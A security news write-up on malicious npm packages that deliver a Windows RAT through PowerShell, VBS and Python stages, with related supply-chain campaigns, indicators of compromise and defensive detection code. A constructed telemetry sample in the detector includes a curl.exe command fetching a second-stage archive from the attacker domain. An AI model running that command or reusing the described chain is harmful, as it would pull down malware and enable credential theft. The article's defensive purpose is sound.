Introduction: A Growing Threat Hidden in Trusted Development Tools
The modern software supply chain has become one of the most targeted attack surfaces in cybersecurity. What once was a trusted ecosystem of open-source libraries is now increasingly exploited as a silent delivery channel for malware. In the latest wave of attacks, cybersecurity researchers uncovered malicious npm packages disguised as harmless build tools that secretly deploy a Windows-based Remote Access Trojan (RAT). These packages blend into normal developer workflows, leveraging familiar naming conventions and widely used dependencies to avoid suspicion while executing a deeply layered infection chain.
Discovery of Malicious npm Packages Masquerading as Legitimate Tools
Security analysts identified three npm packages published under the user “abdrizak” that collectively form a coordinated malware delivery system. The packages include aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser. Despite their low download counts, their design is highly deceptive, mimicking legitimate PostCSS-related utilities used in large-scale JavaScript development environments.
Each package is structured to appear functional. One pretends to handle AES decoding layers, another claims to optimize CSS selector performance, while a third mimics a widely trusted dependency ecosystem component. Beneath this surface-level legitimacy, however, lies a chained execution mechanism that ultimately leads to Windows system compromise.
Abuse of Trusted Dependency Chains in the npm Ecosystem
The attackers carefully designed dependency relationships to increase trust. One package depends on another malicious module, which itself references legitimate libraries such as postcss-selector-parser. This blending of malicious and legitimate dependencies creates a camouflage effect, making detection significantly harder for automated scanners and human reviewers alike.
By referencing libraries with millions of weekly downloads, the attackers exploit implicit trust in well-known open-source ecosystems. Developers who install these packages unknowingly initiate a chain reaction that sets the malware deployment in motion.
Multi-Stage Infection Chain Leading to Windows RAT Deployment
Once installed, the packages execute a JavaScript dropper that writes a PowerShell script named settings.ps1 onto the system. This script then downloads a second-stage payload from an external server hosted at nvidiadriver[.]net using curl.exe.
The downloaded payload is delivered as a ZIP archive containing a Visual Basic Script (update.vbs), a bundled Python runtime, and multiple compiled Python extensions. When executed, the VBS file prepares the environment and launches loader.py, which activates the malware’s core functionality.
This multi-layered structure ensures resilience, allowing the malware to bypass simple detection mechanisms while establishing persistence across Windows systems.
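The chain described above can be matched in process-creation telemetry. The following is an added example, not code from the researchers or the original report: the event shape ({host, ts, image, cmd}), host names and sample command lines are constructed, and the interpreter image names (wscript.exe/cscript.exe, python.exe/pythonw.exe) are assumptions.

```javascript
// Added example. File and domain names come from the article; the event shape
// ({host, ts, image, cmd}) and the sample events are constructed.
const STAGE2_HOST = 'nvidiadriver[.]net'.replace('[.]', '.'); // refanged only for matching

// Stages in the order the article describes them. Interpreter image names are assumptions.
const STAGES = [
  { id: 'powershell-settings.ps1', test: e => /powershell\.exe$/i.test(e.image) && /\bsettings\.ps1\b/i.test(e.cmd) },
  { id: 'curl-second-stage', test: e => /curl\.exe$/i.test(e.image) && e.cmd.toLowerCase().includes(STAGE2_HOST) },
  { id: 'wsh-update.vbs', test: e => /[wc]script\.exe$/i.test(e.image) && /\bupdate\.vbs\b/i.test(e.cmd) },
  { id: 'python-loader.py', test: e => /pythonw?\.exe$/i.test(e.image) && /\bloader\.py\b/i.test(e.cmd) },
];

// Per host, match stages as an ordered subsequence of time-sorted events. A single
// hit (update.vbs is a common file name) is not reported; minStages sets the bar.
function findChains(events, minStages = 2) {
  const byHost = new Map();
  for (const e of [...events].sort((a, b) => a.ts - b.ts)) {
    const st = byHost.get(e.host) || { next: 0, stages: [] };
    for (let i = st.next; i < STAGES.length; i++) {
      if (STAGES[i].test(e)) { st.stages.push(STAGES[i].id); st.next = i + 1; break; }
    }
    byHost.set(e.host, st);
  }
  return [...byHost].filter(([, st]) => st.stages.length >= minStages)
    .map(([host, st]) => ({ host, stages: st.stages }));
}

const SYS = 'C:\\Windows\\System32\\';
const SAMPLE_EVENTS = [ // constructed
  { host: 'dev-01', ts: 1, image: 'C:\\Program Files\\nodejs\\node.exe', cmd: 'node install.js' },
  { host: 'dev-01', ts: 2, image: SYS + 'WindowsPowerShell\\v1.0\\powershell.exe', cmd: 'powershell.exe -File settings.ps1' },
  { host: 'dev-01', ts: 3, image: SYS + 'curl.exe', cmd: `curl.exe -o stage2.zip https://${STAGE2_HOST}/<path>` },
  { host: 'dev-01', ts: 4, image: SYS + 'wscript.exe', cmd: 'wscript.exe update.vbs' },
  { host: 'dev-01', ts: 5, image: 'C:\\<extract-dir>\\python.exe', cmd: 'python.exe loader.py' },
  { host: 'dev-02', ts: 1, image: SYS + 'wscript.exe', cmd: 'wscript.exe update.vbs' },
  { host: 'dev-02', ts: 2, image: SYS + 'curl.exe', cmd: 'curl.exe https://registry.npmjs.org/' },
];
console.log(findChains(SAMPLE_EVENTS));
```

Only dev-01 is reported; dev-02 runs a script with the same file name but shows no other stage.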
Capabilities of the Remote Access Trojan and Data Exfiltration
The final payload is a fully functional Remote Access Trojan designed for stealth and control. It collects system information, steals stored credentials from Google Chrome, extracts browser extension data, executes remote shell commands, and enables file upload and download operations.
Communication with the command-and-control server located at 95.216.92[.]207:8080 allows attackers to maintain persistent access to compromised machines. The RAT’s modular structure makes it flexible, allowing attackers to expand functionality without modifying the core infection chain.
Python Extension Modules Powering the Malware Infrastructure
The malware relies on compiled Python modules built using Nuitka, each serving a specialized role within the system:
config.pyd manages constants, registry keys, and command IDs
api.pyd handles HTTP communication with the C2 server
audiodriver.pyd controls the main execution loop
command.pyd executes system profiling and VM detection
auto.pyd steals Chrome credentials and bypasses encryption protections
util.pyd manages compression and data packaging
This modular architecture reflects a professional-grade malware design, resembling commercial spyware frameworks rather than amateur scripts.
Security Experts Warn of Lookalike Packages and Supply Chain Risk
Researchers from JFrog emphasized that even seemingly minor parser-style packages can conceal complex multi-stage payloads. The attackers rely on naming similarity and dependency confusion to bypass developer scrutiny.
The key lesson is clear: build systems are no longer passive tools. They are active attack vectors. Any dependency, especially those mimicking popular libraries, must be treated as potentially hostile until verified.
Broader npm and TypeScript Ecosystem Under Parallel Attack
This campaign is not isolated. Multiple concurrent operations have been detected across the npm ecosystem.
One malicious package named apintergrationpost installs a Linux-based RAT called MYRA. It compiles a native rootkit during installation, establishes persistence through systemd services, and enables live screen streaming and remote shell access.
Another campaign involves @withgoogle/stitch-sdk, which impersonates Google’s Stitch AI tool. It steals developer credentials from sources including SSH keys, Git configs, npm settings, Docker configurations, and more, exfiltrating them to a remote domain controlled by attackers.
A third cluster of packages including procwire, routecraft, endpointmap, bytecraft, and staticlayer works as a coordinated dropper network, executing malware during npm install and distributing payloads based on server-side triggers.
Supply Chain Attack Extending into AI and Blockchain Infrastructure
Researchers also identified attacks targeting the gonex-AI/Understand-Anything project. The malicious payload uses multi-stage execution, including blockchain-based command retrieval from Tron transactions. This unconventional method allows attackers to hide instructions in public decentralized systems, making takedown nearly impossible.
The malware beacons multiple command servers, decrypts payloads using XOR logic, and dynamically evaluates downloaded bot clients, demonstrating a shift toward adaptive, infrastructure-resistant malware design.
North Korean Linked Campaigns and the Rise of PolinRider Activity
Security analysts also observed overlap with a North Korean-linked supply chain operation known as PolinRider. This campaign injects obfuscated JavaScript into legitimate GitHub repositories, affecting nearly 2,000 projects.
The malware chain deploys BeaverTail, a known data stealer, which then installs the InvisibleFerret backdoor. The operation uses deceptive pull requests, whitespace-obfuscated diffs, and blockchain-based C2 fallback channels, making detection extremely challenging.
Urgent Response and Developer Security Recommendations
Security teams strongly advise immediate removal of any affected packages. Developers are urged to inspect node_modules directories, audit dependency trees, and rotate all credentials used on impacted machines.
Ignoring such infections may result in full system compromise, credential theft, and long-term persistence within development environments.
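One way to carry out the dependency-tree audit, as an added example rather than tooling from the report: it checks a parsed package-lock.json for the package names listed in this article by exact name, so the legitimate postcss-minify-selectors and postcss-selector-parser are not flagged, and separately lists any other package that declares an install script. The sample lockfile, its versions and the package name native-addon-example are constructed.

```javascript
// Added example. Package names are the ones named in this article.
const FLAGGED = new Set([
  'aes-decode-runner-pro', 'postcss-minify-selector', 'postcss-minify-selector-parser',
  'apintergrationpost', '@withgoogle/stitch-sdk',
  'procwire', 'routecraft', 'endpointmap', 'bytecraft', 'staticlayer',
]);

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"; null for keys outside node_modules.
function nameFromLockPath(path) {
  const i = path.lastIndexOf('node_modules/');
  return i === -1 ? null : path.slice(i + 'node_modules/'.length);
}
// Accepts a parsed package-lock.json: v2/v3 "packages" map, or v1 nested "dependencies".
function auditLock(lock) {
  const findings = [];
  const check = (name, path, meta) => {
    // Exact match only: a substring test would also hit legitimate, similarly named packages.
    if (FLAGGED.has(name)) findings.push({ name, path, reason: 'named-in-report' });
    else if (meta.hasInstallScript) findings.push({ name, path, reason: 'install-script' });
  };
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      const name = nameFromLockPath(path);
      if (name) check(name, path, meta); // skips "" (the root project)
    }
  } else {
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = `${prefix}node_modules/${name}`;
        check(name, path, meta);
        walk(meta.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return findings;
}
// Constructed sample lockfile (versions are placeholders).
const SAMPLE_LOCK = {
  packages: {
    '': { name: 'demo-app', version: '0.0.0' },
    'node_modules/postcss-selector-parser': { version: '0.0.0' },
    'node_modules/postcss-minify-selectors': { version: '0.0.0' }, // legitimate name, one letter longer
    'node_modules/postcss-minify-selector': { version: '0.0.0', hasInstallScript: true },
    'node_modules/postcss-minify-selector/node_modules/postcss-minify-selector-parser': { version: '0.0.0' },
    'node_modules/native-addon-example': { version: '0.0.0', hasInstallScript: true },
  },
};
console.log(auditLock(SAMPLE_LOCK));
```

In real use, pass it JSON.parse of the project's package-lock.json; an install-script finding is a prompt for review, since many legitimate native add-ons declare one.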
What Undercode Says:
The npm ecosystem is no longer just a dependency manager; it is a battlefield for supply chain infiltration
Malicious actors are increasingly targeting developer trust rather than system vulnerabilities
Multi-stage payload delivery is becoming standard in open-source malware campaigns
Dependency confusion attacks are evolving into identity mimicry attacks
Attackers are now leveraging legitimate high-download libraries as camouflage anchors
PowerShell remains a preferred execution layer for Windows-based infection chains
Visual Basic scripts are being reused as silent orchestration layers for Python malware
Bundled runtimes reduce dependency visibility and bypass traditional detection tools
Credential theft modules are increasingly modular and reusable across campaigns
Chrome credential extraction remains a primary target for cross-platform attackers
Nuitka-compiled binaries make reverse engineering significantly harder
Command-and-control infrastructure is shifting toward decentralized and resilient hosting
Blockchain-based payload delivery introduces near-irreversible attack channels
Multi-ecosystem targeting (npm, GitHub, AI tools) shows coordinated global operations
Supply chain compromise is now preferred over direct endpoint exploitation
Fake development tools are becoming indistinguishable from legitimate utilities
Malware authors are mimicking PostCSS ecosystem naming conventions for trust exploitation
VM detection logic suggests attackers are avoiding sandbox analysis environments
Fileless execution techniques are being combined with traditional persistence methods
Credential aggregation from multiple sources increases attacker monetization potential
AI tooling impersonation expands attack surface beyond traditional dev tools
Rootkit compilation during installation signals advanced attacker sophistication
Systemd persistence shows Linux targeting parallel to Windows infection chains
GitHub repository poisoning remains a scalable mass infection method
Whitespace obfuscation is used to bypass diff-based code review
Multi-stage C2 architecture improves resilience against takedown
Developer pipelines are now primary infiltration vectors
Security scanning tools struggle with mixed legitimate-malicious dependency graphs
Attackers are increasingly using hybrid scripting languages for cross-platform execution
The convergence of npm, AI tools, and blockchain indicates ecosystem-level threats
Trust in package registries is becoming the weakest link in software security
❌ Malicious npm packages are publicly confirmed by researchers, but download impact appears limited and not globally widespread yet
✅ Multi-stage Windows RAT delivery chain (PowerShell, VBS, Python) is technically consistent with known supply chain malware behavior
❌ Attribution to specific nation-state groups is suggested in parallel campaigns but not directly proven for this npm package cluster
Prediction
(+1) Supply chain attacks will increase across npm and similar registries as attackers refine dependency-based infection methods and exploit developer trust models
(-1) Security tooling will struggle to fully eliminate lookalike package threats due to rapid publishing cycles and low-cost repository creation
(+1) Future malware will increasingly adopt multi-ecosystem delivery, combining blockchain, AI tooling impersonation, and CI/CD pipeline abuse
Deep Analysis
Linux command:
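grep -R "postinstall" node_modules/    # packages that declare a postinstall hook
find . -name "*.ps1" -o -name "*.vbs"  # dropped PowerShell / VBScript files
ps aux | grep node                     # running Node.js processes
netstat -tulnp                         # listening sockets with owning process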
Windows command:
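Get-ChildItem -Recurse -Include *.ps1,*.vbs          # dropped PowerShell / VBScript files
Get-Process | Where-Object {$_.Path -like "*node*"}  # processes running from a node path
netstat -ano                                         # connections with owning PID
wmic process list full                               # full process details, including command lines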
Mac command:
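find . -name "*.js" -o -name "*.sh"  # script files under the current directory
lsof -i                              # open network connections
ps aux | grep node                   # running Node.js processes
launchctl list                       # loaded launchd jobs (persistence)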
These commands reflect how defenders inspect suspicious npm installations, detect persistence scripts, and trace hidden execution chains across development environments.
References:
Reported By: thehackernews.com